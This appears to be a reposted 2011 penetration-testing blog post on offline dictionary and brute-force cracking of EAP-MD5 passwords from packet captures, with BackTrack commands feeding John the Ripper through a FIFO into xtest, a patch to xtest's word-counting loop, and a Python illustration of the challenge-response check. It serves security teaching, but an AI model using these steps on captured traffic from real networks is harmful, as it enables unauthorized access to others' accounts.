Apr 27, 2011

EAP-MD5 Offline password attacks


If you want to get the script and read all the details of this article, please go to the Source.

1. Make a FIFO
root@bt:/pentest/passwords/jtr# mknod pwque p

2. Create a word list.
root@bt:/pentest/passwords/jtr# ./john -i:ALL --stdout > pwque &

3. Crack it.
root@bt:/pentest/passwords/jtr# ~/xtest-1.0/xtest -w ./pwque -c ~/xtest-1.0/sample-pcaps/7971G-EAP_Success.pcap


/* Calculate Total Number of passwords for attack */
/* Reads the word list to end of file just to count it, then rewinds so the */
/* guessing loop starts over from the first word. A FIFO has no end of file, */
/* so with a FIFO as input this counting loop never returns.               */
while( fgets(passwd, sizeof(passwd), in_file) != NULL ) {
    wordcount++;
}
rewind(in_file);
printf("[+] Attempting Dictionary Attack with %d passwords of the dictionary %s\n", wordcount, dictFile);


This loop reads the password file until it reaches the end and prints how many passwords it counted. Then it calls rewind() to go back to the beginning of the file before the guessing starts. That doesn't work when you are brute-forcing from a FIFO, because there is no end of file: the counting loop never finishes. Remove ALL those lines of code and recompile so xtest can take the FIFO as its word-list input. After making that change, the commands above work properly. (Note: Alternatively, you can use Josh's patch. Josh Wright was nice enough to email me his xtest patch. You can download it here: xtest-stdin-warnfix.diff)
xtest can do more than just brute-force an EAP-MD5 hash in a packet capture, and I kind of like having the password count in my output (the code we removed). Tim said, "I bet SCAPY would make writing an EAP-MD5 brute-force pretty simple". He was right. With SCAPY, parsing packets is trivial, and writing an EAP-MD5 brute-force tool only requires a few lines of code.
Submitted for your approval: eapmd5crack.py
The tool accepts a packet capture containing an EAP-MD5 challenge and response and runs a dictionary attack to recover the password. You can also feed it a FIFO to brute-force passwords with JTR.
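As an added illustration (not the article's eapmd5crack.py or xtest), this shows why a captured EAP-MD5 exchange can be checked offline at all: the response is a single MD5 over Identifier, password and challenge (RFC 3748 section 5.4, reusing CHAP from RFC 1994), so each guess costs one hash. The candidate source is consumed as a one-pass stream, which is the property that lets a FIFO work without the rewind the article removes. The identifier, challenge and password are constructed values, not from any capture.

```python
import hashlib
import sys
from typing import Iterable, Optional

# EAP-MD5 answers a Request with MD5(Identifier || password || challenge).
# Identifier is the one-byte EAP header field; challenge and response are the
# value fields of the Request and Response packets. This is the whole reason
# the exchange is offline-guessable and why EAP-MD5 should be replaced by a
# tunnelled method (EAP-TLS, PEAP) on any network that still uses it.

def eap_md5_response(identifier: int, password: bytes, challenge: bytes) -> bytes:
    """Compute the 16-byte EAP-MD5 response a peer sends for a challenge."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()

def find_password(identifier: int, challenge: bytes, response: bytes,
                  candidates: Iterable[bytes]) -> Optional[bytes]:
    """Return the first candidate whose response matches, or None.

    Candidates are read once, front to back, with no rewind and no count, so
    the same loop works for a plain word list and for a FIFO fed by a
    generator such as 'john --stdout'.
    """
    for pw in candidates:
        if eap_md5_response(identifier, pw, challenge) == response:
            return pw
    return None

def read_wordlist(path: str) -> Iterable[bytes]:
    """Yield one candidate per line from a file or FIFO, newline stripped."""
    with open(path, "rb") as fh:
        for line in fh:
            yield line.rstrip(b"\r\n")

# Constructed sample exchange (hypothetical, not from a real capture):
# EAP Identifier 42, a 16-byte challenge, and the response the peer would
# have sent if its password were "winter2011".
SAMPLE_ID = 42
SAMPLE_CHALLENGE = bytes.fromhex("0123456789abcdef0123456789abcdef")
SAMPLE_RESPONSE = eap_md5_response(SAMPLE_ID, b"winter2011", SAMPLE_CHALLENGE)

if __name__ == "__main__":
    # Optional argument: path to a word list or FIFO; otherwise a tiny inline list.
    words = read_wordlist(sys.argv[1]) if len(sys.argv) > 1 else iter([b"password", b"winter2011"])
    hit = find_password(SAMPLE_ID, SAMPLE_CHALLENGE, SAMPLE_RESPONSE, words)
    print("[+] password found: %r" % hit if hit else "[-] not in word list")
```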

Here is a sample run using a dictionary:

Source: http://pauldotcom.com/2011/04/eap-md5-offline-password-attac.html